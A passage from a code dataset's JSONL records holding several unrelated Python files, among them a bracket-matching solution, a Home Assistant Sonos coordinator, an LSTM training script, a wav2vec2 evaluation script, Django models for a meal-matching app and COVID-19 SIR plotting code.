的字符串,判断字符串是否有效。\n例子:输入: \"()[]{}\" 输出: true 输入: \"{[]}\" 输出: true\n日期:2018/10/20\n\"\"\"\n\n\nclass Solution:\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = []\n rule = {'(': 1, '[': 2, '{': 3, ')': -1, ']': -2, '}': -3}\n for ch in s:\n if rule[ch] < 0 and len(stack) == 0: return False\n if rule[ch] > 0: stack.append(ch)\n if rule[ch] < 0 and rule[stack.pop()] != -rule[ch]: return False\n if len(stack) == 0: return True\n else: return False\n\n\nsolution = Solution()\nprint(solution.isValid('(([]){})'))\n","sub_path":"day10/isValid.py","file_name":"isValid.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"127148838","text":"\"\"\"Class representing a Sonos household storage helper.\"\"\"\nfrom __future__ import annotations\n\nfrom collections import deque\nfrom collections.abc import Callable, Coroutine\nimport logging\nfrom typing import Any\n\nfrom pysonos import SoCo\n\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.helpers.debounce import Debouncer\n\nfrom .const import DATA_SONOS\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass SonosHouseholdCoordinator:\n \"\"\"Base class for Sonos household-level storage.\"\"\"\n\n def __init__(self, hass: HomeAssistant, household_id: str) -> None:\n \"\"\"Initialize the data.\"\"\"\n self.hass = hass\n self.household_id = household_id\n self._processed_events = deque(maxlen=5)\n self.async_poll: Callable[[], Coroutine[None, None, None]] | None = None\n\n def setup(self, soco: SoCo) -> None:\n \"\"\"Set up the SonosAlarm instance.\"\"\"\n self.update_cache(soco)\n self.hass.add_job(self._async_create_polling_debouncer)\n\n async def _async_create_polling_debouncer(self) -> None:\n \"\"\"Create a polling debouncer in async context.\n\n Used to ensure redundant poll requests from all speakers are coalesced.\n \"\"\"\n self.async_poll = Debouncer(\n self.hass,\n _LOGGER,\n cooldown=3,\n immediate=False,\n function=self._async_poll,\n ).async_call\n\n async def _async_poll(self) -> None:\n \"\"\"Poll any known speaker.\"\"\"\n discovered = self.hass.data[DATA_SONOS].discovered\n\n for uid, speaker in discovered.items():\n _LOGGER.debug(\"Updating %s using %s\", type(self).__name__, speaker.soco)\n success = await self.async_update_entities(speaker.soco)\n\n if success:\n # Prefer this SoCo instance next update\n discovered.move_to_end(uid, last=False)\n break\n\n @callback\n def async_handle_event(self, event_id: str, soco: SoCo) -> None:\n \"\"\"Create a task to update from an event callback.\"\"\"\n if event_id in self._processed_events:\n return\n self._processed_events.append(event_id)\n self.hass.async_create_task(self.async_update_entities(soco))\n\n async def async_update_entities(self, soco: SoCo) -> bool:\n \"\"\"Update the cache and update entities.\"\"\"\n raise NotImplementedError()\n\n def update_cache(self, soco: SoCo) -> Any:\n \"\"\"Update the cache of the household-level feature.\"\"\"\n raise NotImplementedError()\n","sub_path":"homeassistant/components/sonos/household_coordinator.py","file_name":"household_coordinator.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211107890","text":"import os\nimport pickle\n\nimport pandas as pd\nimport numpy as np\nimport time\n# import matplotlib.pyplot as plt\n# import warnings\n\nimport keras\nfrom keras.preprocessing import 
sequence\nimport tensorflow as tf\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n\n# assertion packages\n\nfrom utils import display_exec_time\nfrom processing.marsdataloader import MARSDataLoader\n\nimport argparse\n\n# Control for random states\nimport random\n\nSEED = 2020\nos.environ['PYTHONHASHSEED'] = str(SEED)\nrandom.seed(SEED) # `python` built-in pseudo-random generator\nnp.random.seed(SEED) # numpy pseudo-random generator\ntf.set_random_seed(SEED) # tensorflow pseudo-random generator\n\n# # set session after random seeds according to https://github.com/tensorflow/tensorflow/issues/18323\n# sess = tf.Session(graph=tf.get_default_graph, config=tf.ConfigProto())\n# keras.backend.set_session(sess)\n\n# define format for saving tests TODO add destabilizing deflection file name\nTRAIN_PATH_X = \"data/data_{}ms/{}scale_{}ahead_train_X{}.npy\"\nTRAIN_PATH_Y = \"data/data_{}ms/{}scale_{}ahead_train_y{}.npy\"\nTEST_PATH_X = \"data/data_{}ms/{}scale_{}ahead_test_X{}.npy\"\nTEST_PATH_Y = \"data/data_{}ms/{}scale_{}ahead_test_y{}.npy\"\n\nCALCULATED = \"_calc\"\nORIGINAL = \"_orig\"\n\n\n# Argparser\n# noinspection PyTypeChecker\nargparser = argparse.ArgumentParser(prog=\"LSTM Trainer Argparser\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nargparser.add_argument(\n '--window', type=float, default=1.0, help='time scale of training data, in seconds')\nargparser.add_argument(\n '--ahead', type=float, default=0.5, help='prediction timing ahead of event, in seconds')\nargparser.add_argument(\n '--cal_vel', action='store_true', help='whether to use calculated velocity instead of original')\nargparser.add_argument(\n '--early_stop', action='store_true', help='whether to stop early training when converged')\nargparser.add_argument(\n '--patience', type=int, default=3, help='max number of epochs allowed with no improvement, if early stopping')\nargparser.add_argument(\n '--conv_crit', type=str.lower, default='loss', choices=['loss'],\n help='type of convergence criteria') # TODO explore more crit\n\nargs = argparser.parse_args()\n\n# convert seconds to ms\nwindow_ms = int(args.window * 1000)\nahead_ms = int(args.ahead * 1000)\nuse_calculated = args.cal_vel\nearly_stopping = args.early_stop\npatience_epochs = args.patience\nconv_criteria = args.conv_crit\n\n# print training info\nprint(\"Training information:\")\nprint(f\"Now training model with {window_ms}ms scale, {ahead_ms}ms ahead.\\n\"\n f\"Using calculated weight? {use_calculated}\\n\"\n f\"Early Stopping? 
{early_stopping}\\n\")\n\nif early_stopping:\n print(f\"Stopping early if no {conv_criteria} improvement in {patience_epochs} epochs.\\n\")\n\nif use_calculated:\n print(\"Using calculated velocity...\")\n\n\n#### Begin script\n# confirm TensorFlow sees the GPU\n# assert 'GPU' in str(device_lib.list_local_devices()), \"TensorFlow cannot find GPU\"\n#\n# # confirm Keras sees the GPU (for TensorFlow 1.X + Keras)\n# assert len(tensorflow_backend._get_available_gpus()) > 0, \"Keras cannot find GPU\"\n\n### time the script\nbegin = time.time()\n\n# TODO start change here: set window - ahead - rolling as positional arguments instead!\n# loader = MARSDataLoader(args.window, args.ahead, args.)\n\ndef load_sets_after_split(ahead_ms, scale_ms, mode=ORIGINAL):\n if mode not in (CALCULATED, ORIGINAL):\n raise ValueError(\"Unknown velocity mode: {}\".format(mode))\n\n return map(lambda format_path: np.load(open(format_path.format(scale_ms, ahead_ms, scale_ms, mode), \"rb\")),\n (TRAIN_PATH_X, TEST_PATH_X, TRAIN_PATH_Y, TEST_PATH_Y))\n\ndef save_sets_after_split(X_train, X_test, y_train, y_test, ahead_ms, scale_ms, mode=ORIGINAL):\n if mode not in (CALCULATED, ORIGINAL):\n raise ValueError(\"Unknown velocity mode: {}\".format(mode))\n for format_path, arr in ((TRAIN_PATH_X, X_train), (TEST_PATH_X, X_test), (TRAIN_PATH_Y, y_train), (TEST_PATH_Y, y_test)):\n path = format_path.format(scale_ms, ahead_ms, scale_ms, mode)\n np.save(path, arr)\n print(\"array saved at {}\".format(path))\n # map(lambda format_path, arr: np.save(open(format_path.format(scale_ms, ahead_ms, scale_ms, mode), \"wb\"), arr), #TODO what's wrong??\n # ((TRAIN_PATH_X, X_train), (TEST_PATH_X, X_test), (TRAIN_PATH_Y, y_train), (TEST_PATH_Y, y_test)))\n\n\n# Now, save model and training stats\n# ensure output folder exists\nif not os.path.exists(f\"results/results_{window_ms}\"):\n os.makedirs(f'results/results_{window_ms}')\n\ntry:\n if use_calculated:\n X_train, X_test, y_train, y_test = load_sets_after_split(ahead_ms, window_ms, mode=CALCULATED)\n else:\n X_train, X_test, y_train, y_test = load_sets_after_split(ahead_ms, window_ms)\n\nexcept:\n print(\"did not find train and test files... 
now generating...\")\n #### read all the positive samples TODO merge these paths with generate data (use 1 var and avoid hard coding)\n crash_featurized = pd.read_pickle(f'data/data_{window_ms}ms/crash_feature_label_{ahead_ms}ahead_{window_ms}scale_test')\n\n ### read all the negative samples\n noncrash_featurized = pd.read_pickle(f'data/data_{window_ms}ms/noncrash_feature_label_{ahead_ms}ahead_{window_ms}scale_test')\n\n #### merge both positive and negative together\n data_final = pd.concat([crash_featurized, noncrash_featurized])\n data_final = data_final[['features_cal_vel','features_org_vel','label']]\n\n\n #### split the data with calculated velocity and original velocity seperately\n\n ### calculated velocity\n # X_cal = data_final.features_cal_vel\n # X_cal = np.array([np.vstack(i) for i in X_cal])\n\n\n ### original velocity\n # choose velocity TODO change this to before loading data\n if use_calculated:\n X_all = np.array(data_final.features_cal_vel.to_list())\n else:\n X_all = np.array(data_final.features_org_vel.to_list())\n\n # X_all = np.array([np.vstack(i) for i in X_all])\n print(\"X_all shape: {}\".format(X_all.shape))\n\n # y_all = np.array(data_final.label)\n\n y_all = data_final.label.to_numpy().reshape(-1, 1)\n print(\"y_all shape: {}\".format(y_all.shape))\n print(f\"Total crash instances: {np.count_nonzero(y_all == 1)}\")\n # X_train_cal, X_test_cal, y_train_cal, y_test_cal = train_test_split(X_cal, y, test_size=0.2, random_state=42)\n\n X_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.2, random_state=SEED)\n\n if use_calculated:\n save_sets_after_split(X_train, X_test, y_train, y_test, ahead_ms, window_ms, mode=CALCULATED)\n else:\n save_sets_after_split(X_train, X_test, y_train, y_test, ahead_ms, window_ms)\n\nprint(\"X_train shape: {}\".format(X_train.shape))\nprint(\"y_train shape: {}\".format(y_train.shape))\nprint(\"X_test shape: {}\".format(X_test.shape))\nprint(\"y_test shape: {}\".format(y_test.shape))\n##### make data into sequence for training\n\n### calculated velocity\n# X_train_cal = sequence.pad_sequences(X_train_cal, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_train_cal = np.array(y_train_cal).reshape(len(y_train_cal),1)\n\n# X_test_cal = sequence.pad_sequences(X_test_cal, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_test_cal = np.array(y_test_cal).reshape(len(y_test_cal),1)\n\nprint(\"Processing Data...\")\n\n# pad sequences TODO trains don't need to be aligned?\nX_train = sequence.pad_sequences(X_train, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_train = y_train.reshape(-1, 1)\n\nX_test = sequence.pad_sequences(X_test, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_test = y_test.reshape(-1, 1)\n\n\n#### onehotecoder\nenc = OneHotEncoder(handle_unknown='ignore', sparse=False)\nenc = enc.fit(y_train)\ny_train = enc.transform(y_train)\ny_test = enc.transform(y_test)\n\nprint(\"After padding X and OH encoding y...\")\nprint(\"X_train shape: {}\".format(X_train.shape))\nprint(\"y_train shape: {}\".format(y_train.shape))\nprint(\"X_test shape: {}\".format(X_test.shape))\nprint(\"y_test shape: {}\".format(y_test.shape))\n\n\n### train model\n\nclass_weights = [{\n 0:1,\n 1:1\n},\n{\n 0:1,\n 1:10\n},\n{\n 0:1,\n 1:50\n}]\n\n### try different weights\nfor i in range(len(class_weights)):\n print(f'---------Now training model with class weight {class_weights[i][0]}to{class_weights[i][1]}-------------')\n # initialize new model for this setting\n 
model = keras.Sequential()\n model.add(\n keras.layers.LSTM(\n units=128,\n input_shape=[X_train.shape[1], X_train.shape[2]]\n )\n )\n\n model.add(keras.layers.Dropout(rate=0.5, seed=SEED))\n model.add(keras.layers.Dense(units=128, activation='relu'))\n model.add(keras.layers.Dense(y_train.shape[1], activation='softmax'))\n model.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['categorical_accuracy']\n )\n\n # early stopping to save up GPU, stops training when there's no loss reduction in 4 epochs\n if early_stopping:\n callback = tf.keras.callbacks.EarlyStopping(monitor=conv_criteria, patience=patience_epochs)\n history = model.fit(\n X_train, y_train,\n epochs=30,\n batch_size=32,\n validation_split=0.1,\n shuffle=False,\n class_weight = class_weights[i],\n callbacks=[callback]\n )\n else:\n history = model.fit(\n X_train, y_train,\n epochs=30,\n batch_size=32,\n validation_split=0.1,\n shuffle=False,\n class_weight=class_weights[i]\n )\n\n model.evaluate(X_test, y_test)\n y_pred = model.predict(X_test)\n\n\n predictions_org = y_pred[:, 0]\n predictions_org[predictions_org>=0.5] = 1\n predictions_org[predictions_org<0.5] = 0\n\n testing_org = y_test[:, 0]\n\n ### confusion matrix\n cf_array = confusion_matrix(testing_org, predictions_org)\n\n ### save the results with accuracy, recall, precision\n df_resutls = pd.DataFrame(cf_array)\n ### accuracy\n df_resutls['accuracy'] = (df_resutls.iloc[0,0] + df_resutls.iloc[1,1])/np.sum(cf_array)\n ### recall\n df_resutls['recall'] = df_resutls.iloc[0,0]/(df_resutls.iloc[0,0] + df_resutls.iloc[0,1])\n ### precision\n df_resutls['precision'] = df_resutls.iloc[0,0]/(df_resutls.iloc[0,0] + df_resutls.iloc[1,0])\n\n\n # save model to path, can be loaded with, e.g., reconstructed_model = keras.models.load_model(path_to_folder)\n model.save(f'results/results_{window_ms}/{window_ms}scale_{ahead_ms}ahead_{class_weights[i][0]}to{class_weights[i][1]}_model_orig_vel')\n # save test set stats\n df_resutls.to_csv(f'results/results_{window_ms}/{window_ms}scale_{ahead_ms}ahead_{class_weights[i][0]}to{class_weights[i][1]}_stats_orig_vel.csv')\n # pickle model training history\n pickle.dump(history, open(f'results/results_{window_ms}/{window_ms}scale_{ahead_ms}ahead_{class_weights[i][0]}to{class_weights[i][1]}_history_orig_vel.pkl', \"wb\"))\n\ndisplay_exec_time(begin, scr_name=\"model.py\")\n # print(predictions_cal.shape, testing_cal.shape)\n\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"627926987","text":"from lux.interestingness.interestingness import interestingness\nfrom lux.view.ViewCollection import ViewCollection\nimport lux\n#for benchmarking\nimport time\n\ndef distribution(ldf,dataTypeConstraint=\"quantitative\"):\n\t'''\n\tGenerates bar chart distributions of different attributes in the dataset.\n\n\tParameters\n\t----------\n\tldf : lux.luxDataFrame.LuxDataFrame\n\t\tLuxDataFrame with underspecified context.\n\n\tdataTypeConstraint: str\n\t\tThe variable that controls the type of distribution chart that will be rendered.\n\n\tReturns\n\t-------\n\trecommendations : Dict[str,obj]\n\t\tobject with a collection of visualizations that result from the Distribution action.\n\t'''\n\timport scipy.stats\n\timport numpy as np\n\n\t#for benchmarking\n\tif ldf.toggleBenchmarking == True:\n\t\ttic = time.perf_counter()\n\n\tif (dataTypeConstraint==\"quantitative\"):\n\t\tquery = 
[lux.Spec(\"?\",dataType=\"quantitative\")]\n\t\tquery.extend(ldf.filterSpecs)\n\t\trecommendation = {\"action\":\"Distribution\",\n\t\t\t\t\t\t\t\"description\":\"Show univariate count distributions of different attributes in the dataset.\"}\n\telif (dataTypeConstraint==\"nominal\"):\n\t\tquery = [lux.Spec(\"?\",dataType=\"nominal\")]\n\t\tquery.extend(ldf.filterSpecs)\n\t\trecommendation = {\"action\":\"Category\",\n\t\t\t\t\t\t \"description\":\"Show bar chart distributions of different attributes in the dataset.\"}\n\tvc = ViewCollection(query)\n\tvc = vc.load(ldf)\t\n\tfor view in vc:\n\t\tview.score = interestingness(view,ldf)\n\tvc = vc.topK(15)\n\trecommendation[\"collection\"] = vc\n\t#for benchmarking\n\tif ldf.toggleBenchmarking == True:\n\t\ttoc = time.perf_counter()\n\t\tprint(f\"Performed distribution action in {toc - tic:0.4f} seconds\")\n\treturn recommendation","sub_path":"lux/action/Distribution.py","file_name":"Distribution.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134728420","text":"from boilerpipe.extract import Extractor\n\n\ndef genericErrorInfo():\n import os, sys\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n errorMessage = fname + ', ' + str(exc_tb.tb_lineno) + ', ' + str(sys.exc_info())\n print('\\tERROR:', errorMessage)\n return errorMessage\n\n\nurlList = []\nwith open(\"URLTable.txt\") as inp:\n for line in inp:\n urlList.append(line)\n\nhtmlTable = [['' for x in range(2)] for y in range(len(urlList))]\n\nfor x in range(len(urlList)):\n htmlTable[x][0], temp, htmlTable[x][1] = urlList[x].split(' ')\n\nhtmlFile = \"RawHtml.html\"\n\nfor x in range(len(htmlTable)):\n try:\n htmlID = htmlTable[x][0]\n rawHtml = open(htmlID+htmlFile, \"r\").read()\n extractor = Extractor(extractor='ArticleExtractor', html=rawHtml)\n print(extractor.getText(), file=open(htmlID+\"RawText.txt\", \"w+\"))\n print(htmlID, \" Success\")\n except:\n htmlID = htmlTable[x][0]\n print(genericErrorInfo(), file=open(htmlID+\"RawText.txt\", \"w+\"))\n print(htmlID, \" Failed\")\n genericErrorInfo()\n","sub_path":"Assignments/Assignment 3/GetRawText.py","file_name":"GetRawText.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"611141609","text":"import os\nimport torch\nimport torchaudio\nimport json\nimport numpy as np\nimport yaml\n\nfrom datasets import load_dataset, load_metric\nfrom transformers import Wav2Vec2ForCTC, Wav2Vec2Processor\nimport text_preprocess\n\nfrom ctcdecode import CTCBeamDecoder\n\n\n\"\"\"\n\nMuch of the code in this file was lifted from a HuggingFace blog entry:\n\nFine-Tune XLSR-Wav2Vec2 for low-resource ASR with Transformers\nhttps://huggingface.co/blog/fine-tune-xlsr-wav2vec2\n\nby Patrick von Platen\n\nAn implementation of a CTC (Connectionist Temporal Classification) beam search decoder with\nKenLM language models support from https://github.com/parlance/ctcdecode has been added.\n \n\"\"\"\n\n\n# Preprocessing the datasets.\n# We need to read the aduio files as arrays\ndef speech_file_to_array_fn(batch):\n batch[\"sentence\"] = text_preprocess.cleanup(batch[\"sentence\"]).strip() # + \" \"\n speech_array, sampling_rate = torchaudio.load(batch[\"path\"])\n batch[\"speech\"] = resampler(speech_array).squeeze().numpy()\n return batch\n\ndef evaluate(batch):\n inputs = processor(batch[\"speech\"], 
sampling_rate=16_000, return_tensors=\"pt\", padding=True)\n \n with torch.no_grad():\n logits = model(inputs.input_values.to(\"cuda\"), attention_mask=inputs.attention_mask.to(\"cuda\")).logits\n\n pred_ids = torch.argmax(logits, dim=-1)\n\n batch[\"pred_strings\"] = processor.batch_decode(pred_ids)[0].strip()\n\n beam_results, beam_scores, timesteps, out_lens = ctcdecoder.decode(logits)\n pred_with_ctc = \"\".join(vocab[n] for n in beam_results[0][0][:out_lens[0][0]])\n batch[\"pred_strings_with_ctc\"]=pred_with_ctc.strip()\n\n beam_results, beam_scores, timesteps, out_lens = ctcdecoder_withlm.decode(logits)\n pred_with_lm = \"\".join(vocab[n] for n in beam_results[0][0][:out_lens[0][0]])\n batch[\"pred_strings_with_lm\"]=pred_with_lm.strip()\n\n return batch\n\n\n#\ntest_dataset = load_dataset(\"common_voice\", \"cy\", split=\"test\")\n\nwer = load_metric(\"wer\")\n\nmodels_root_dir=\"/models\"\nwav2vec2_model_name = \"wav2vec2-xlsr-ft-cy\"\nkenlm_model_name= \"kenlm-cy\"\n\nwav2vec_model_dir = os.path.join(models_root_dir, wav2vec2_model_name)\nprocessor = Wav2Vec2Processor.from_pretrained(wav2vec_model_dir)\nmodel = Wav2Vec2ForCTC.from_pretrained(wav2vec_model_dir)\n\nmodel.to(\"cuda\")\n\nresampler = torchaudio.transforms.Resample(48_000, 16_000)\n\nvocab=processor.tokenizer.convert_ids_to_tokens(range(0, processor.tokenizer.vocab_size))\nspace_ix = vocab.index('|')\nvocab[space_ix]=' '\n\n# load alpha, betas. \nkenlm_model_dir=os.path.join(models_root_dir, kenlm_model_name)\nwith open(os.path.join(kenlm_model_dir, \"config_ctc.yaml\"), 'r') as config_file:\n ctc_lm_params=yaml.load(config_file, Loader=yaml.FullLoader)\n\nctcdecoder = CTCBeamDecoder(vocab, \n model_path='', \n alpha=0,\n beta=0,\n cutoff_top_n=40,\n cutoff_prob=1.0,\n beam_width=100,\n num_processes=4,\n blank_id=processor.tokenizer.pad_token_id,\n log_probs_input=True\n )\n\nctcdecoder_withlm = CTCBeamDecoder(vocab, \n model_path=os.path.join(kenlm_model_dir, \"lm.binary\"),\n alpha=ctc_lm_params['alpha'], # 1.3648747541523258,\n beta=ctc_lm_params['beta'], # 0.441997826890268,\n cutoff_top_n=40,\n cutoff_prob=1.0,\n beam_width=100,\n num_processes=4,\n blank_id=processor.tokenizer.pad_token_id,\n log_probs_input=True\n )\n\ntest_dataset = test_dataset.map(speech_file_to_array_fn)\n\nresult = test_dataset.map(evaluate, batch_size=8)\n\n#for r in result:\n# if r[\"pred_strings\"]!=r[\"pred_strings_with_lm\"]:\n# if (r[\"pred_strings_with_lm\"]==r[\"sentence\"]):\n# print (\"CORRECT\\n{}\\n{}\\n{}\\n\\n\".format(r[\"pred_strings_with_lm\"], r[\"pred_strings\"], r[\"sentence\"]))\n# else:\n# print (\"INCORRECT\\n{}\\n{}\\n{}\\n\\n\".format(r[\"pred_strings_with_lm\"], r[\"pred_strings\"], r[\"sentence\"]))\n\n\nprint(\"WER: {:2f}\".format(100 * wer.compute(predictions=result[\"pred_strings\"], references=result[\"sentence\"])))\nprint(\"WER with CTC: {:2f}\".format(100 * wer.compute(predictions=result[\"pred_strings_with_ctc\"], references=result[\"sentence\"])))\nprint(\"WER with CTC+LM: {:2f}\".format(100 * wer.compute(predictions=result[\"pred_strings_with_lm\"], references=result[\"sentence\"])))\n\n","sub_path":"train/python/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"616482682","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nfrom annoying.fields import AutoOneToOneField\nfrom datetime import datetime\n\n# Create your models here.\nUser = 
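# Hedged sketch of the greedy decoding that processor.batch_decode applies to
# the argmax ids in the record above: collapse consecutive repeats, then drop
# the CTC blank. The vocab, blank id and frame ids here are toy stand-ins,
# not real wav2vec2 output.
toy_vocab = {0: "<pad>", 1: "h", 2: "i"}  # assume id 0 is the CTC blank
blank_id = 0
frame_ids = [1, 1, 0, 2, 2, 0, 0, 2]      # per-frame argmax ids

decoded = []
prev = None
for i in frame_ids:
    if i != prev and i != blank_id:       # skip repeats and blanks
        decoded.append(i)
    prev = i
print("".join(toy_vocab[i] for i in decoded))  # -> "hii"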
get_user_model()\n\nclass Profile(models.Model):\n user = AutoOneToOneField(User, primary_key=True, on_delete=models.CASCADE, null=False)\n joined = models.DateTimeField(auto_now_add = True)\n name = models.CharField(default = '', max_length = 30)\n GENDER = (\n (1, 'Male'),\n (2, 'Female'),\n )\n gender = models.PositiveIntegerField(choices=GENDER, default = 1)\n age = models.PositiveIntegerField(default = 20)\n school = models.CharField(default = 'Seoul National University', max_length = 50)\n major = models.CharField(default = '', max_length = 30)\n description = models.TextField(default = '')\n contact = models.TextField(default = '010-0000-0000')\n\nclass Restaurant(models.Model):\n name = models.CharField(max_length=30)\n description = models.CharField(max_length=50)\n menu = models.TextField(default = '')\n location = models.TextField(default = '')\n hours = models.TextField(default = '')\n\nclass Matching(models.Model):\n owner = models.ForeignKey(Profile, related_name='matchings', on_delete=models.CASCADE, null=False)\n restaurant = models.ForeignKey(Restaurant, on_delete=models.CASCADE, null=False)\n since = models.DateTimeField(default = datetime.now)\n till = models.DateTimeField(default = datetime.now)\n minage = models.PositiveIntegerField(default = 20)\n maxage = models.PositiveIntegerField(default = 30)\n GENDER = (\n (1, 'Male'),\n (2, 'Female'),\n (3, 'Any')\n )\n gender = models.PositiveIntegerField(choices=GENDER, default = 3)\n matchingMessage = models.TextField(default = '')\n keyword = models.TextField(default = '')\n maxNumber = models.PositiveIntegerField(default = 2)\n STATUS = (\n (1, '모집중'),\n (2, '모집 완료'),\n (3, '만남 완료')\n )\n status = models.PositiveIntegerField(choices=STATUS, default=1)\n\nclass MatchingRequest(models.Model):\n user = models.ForeignKey(Profile, related_name='requests', on_delete=models.CASCADE, null=False)\n matching = models.ForeignKey(Matching, related_name='requests', on_delete=models.CASCADE, null=False)\n requestMessage = models.TextField(default = '')\n STATUS = (\n (1, '수락 대기중'),\n (2, '수락됨'),\n )\n status = models.PositiveIntegerField(choices=STATUS, default=1)\n\nclass Notification(models.Model):\n user = models.ForeignKey(Profile, related_name='notifications', on_delete=models.CASCADE, null=False)\n matching = models.ForeignKey(Matching, on_delete=models.SET_NULL, null=True)\n message = models.TextField(default = '')\n ifCheck = models.BooleanField(default = False)\n\nclass MatchingReview(models.Model):\n user = models.ForeignKey(Profile, related_name='reviews', on_delete=models.CASCADE, null=False)\n matching = models.ForeignKey(Matching, on_delete=models.CASCADE, null=True)\n score = models.PositiveSmallIntegerField(default = 3) # 1 ~ 5\n title = models.CharField(default = '', max_length = 30)\n detail = models.TextField(default = '')\n","sub_path":"bobtogether/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"283530892","text":"import numpy\nfrom _fmm2d_py_gpu import fmm2d_py\n\ndef fmm_velocity(xBlob,yBlob,wBlob,sigma,k=2.0,xTarget=None,yTarget=None,Ndirect=35,tol=1.0e-6,cutoff=None):\n\n # convert blob parameters into the parameters of the fmm solver\n alpha = 1.2564312086261696770\n \n ksigmasqr = k*sigma*sigma\n xopt = numpy.sqrt(alpha*ksigmasqr)\n if cutoff==None: cutoff = 5.0*xopt\n\n if xTarget==None:\n xTarget = xBlob.copy()\n yTarget = yBlob.copy()\n\n \n vy_fmm_cpu,vx_fmm_cpu = 
fmm2d_py(xBlob,yBlob,wBlob,xTarget,yTarget,Ndirect,xopt,cutoff,tol)\n \n return -vx_fmm_cpu/(2.0*numpy.pi),-vy_fmm_cpu/(2.0*numpy.pi)\n","sub_path":"src/cpp/blobs/c++/fmm2d_py_cpu_gpu/fmm_velocity.py","file_name":"fmm_velocity.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"230286048","text":"\"\"\"\nWilliam Austin\nPrakash Dhimal\nGeorge Mason University\nCS 584 Theory and Applications of Data Mining\nSemester project: Predicting the Impact of COVID-19\n\"\"\"\nfrom datetime import datetime, timedelta\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nimport matplotlib.ticker as plticker\nimport numpy as np\n\nimport Common as common\nimport Utilities as util\n\n\ndef getFullTickLabel(dayIndex):\n dayIndexInt = int(dayIndex)\n start = datetime(2020, 1, 22)\n offset = timedelta(days=dayIndex)\n tickDate = start + offset\n return tickDate.strftime(\"%b %d\") + \" (\" + str(dayIndexInt) + \")\"\n\n\ndef updateTicks(x, pos):\n return getFullTickLabel(x)\n\n\ndef createHistoricalBetaChart(historicalRange, fullData, countryName):\n betaSmoothed15 = util.getGaussianAverage(fullData[\"beta\"], 1.5)\n betaSmoothed4 = util.getGaussianAverage(fullData[\"beta\"], 4)\n \n figure1, axis1 = plt.subplots()\n figure1.set_size_inches(7.5, 7.5)\n figure1.subplots_adjust(bottom=0.16)\n axis1.plot(historicalRange, fullData[\"beta\"], label=\"Observed Beta\", color=\"gray\")\n # plt.plot(betaSmoothed3)\n # plt.plot(betaSmoothed7)\n axis1.plot(historicalRange, betaSmoothed15, label=\"Smoothed Beta, Sigma = 1.5\", color=\"blue\")\n axis1.plot(historicalRange, fullData[\"betaSmoothed\"], label=\"Smoothed Beta, Sigma = 2.5\", color=\"deepskyblue\")\n axis1.plot(historicalRange, betaSmoothed4, label=\"Smoothed Beta, Sigma = 4\", color=\"limegreen\")\n # plt.plot(gaussianSmoothed2)\n axis1.set_xlabel(\"Day Number\")\n axis1.set_ylabel(\"Transmission Rate\")\n # axis1.xticks(np.arange(0, tsSize, 10))\n axis1.xaxis.set_major_locator(plticker.MultipleLocator(base=10))\n axis1.xaxis.set_tick_params(rotation=60)\n axis1.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n axis1.legend()\n axis1.set_title(\"Historical Transmission Rate for \" + countryName, fontsize=\"xx-large\")\n # figure1.suptitle(\"Historical Transmission Rate for \" + countryName)\n\n\ndef createPredictionChart(tsSize, futurePredictionDays, historicalRange, predictionRange, fullData, futurePredictions,\n countryName):\n figure2, axis2 = plt.subplots()\n figure2.set_size_inches(7.5, 7.5)\n\n axis2.axvspan(tsSize - 1, tsSize + futurePredictionDays - 2, alpha=0.3, color='gray')\n # plt.plot(historicalRange, S)\n axis2.plot(historicalRange, fullData[\"I\"], label=\"Infected (Confirmed Cases)\", color=\"black\", linestyle='solid')\n axis2.plot(historicalRange, fullData[\"R\"], label=\"Recovered (Deaths + Recovered Cases)\", color=\"black\",\n linestyle='dotted')\n\n # plt.plot(predictionRange, SP1)\n axis2.plot(predictionRange, futurePredictions[\"sirConstant\"][1], label=\"Infected Prediction (constant beta)\",\n color=\"red\", linestyle='solid')\n axis2.plot(predictionRange, futurePredictions[\"sirConstant\"][2], label=\"Recovered Prediction (constant beta)\",\n color=\"red\", linestyle='dotted')\n\n axis2.plot(predictionRange, futurePredictions[\"sirDownward\"][1], label=\"Infected Prediction (decreasing beta)\",\n color=\"green\", linestyle='solid')\n axis2.plot(predictionRange, futurePredictions[\"sirDownward\"][2], 
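# Quick numeric check of the blob-to-FMM parameter conversion in fmm_velocity
# above: xopt = sqrt(alpha * k * sigma^2) and the default cutoff is 5 * xopt.
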